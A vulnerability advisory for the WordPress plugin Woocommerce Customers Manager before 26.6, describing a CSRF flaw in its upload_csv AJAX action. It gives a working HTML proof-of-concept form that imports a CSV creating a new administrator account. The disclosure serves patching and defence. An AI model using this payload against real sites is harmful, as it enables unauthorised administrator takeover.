WordPress Plugin Vulnerabilities

Woocommerce Customers Manager < 26.6 - Arbitrary Account Creation/Update via CSRF

Description

The fixes for https://wpscan.com/vulnerability/126143e0-b0cc-4517-862e-3ac557db744f still allowed the issue to be performed via a CSRF attack.

The upload_csv AJAX action, available to authenticated users, did not have proper CRSF check, allowing attacker to make a logged in user with the manage_woocommerce capability, to call it and import arbitrary users and could lead to new administrator accounts being created.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="upload_csv" />
      <input type="hidden" name="send-notification-email" value="no" />
      <input type="hidden" name="csv" value='ID","Password","Role","Login","Email"<#>"","Passw0rd","administrator","admin-attacker","[email protected]"' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>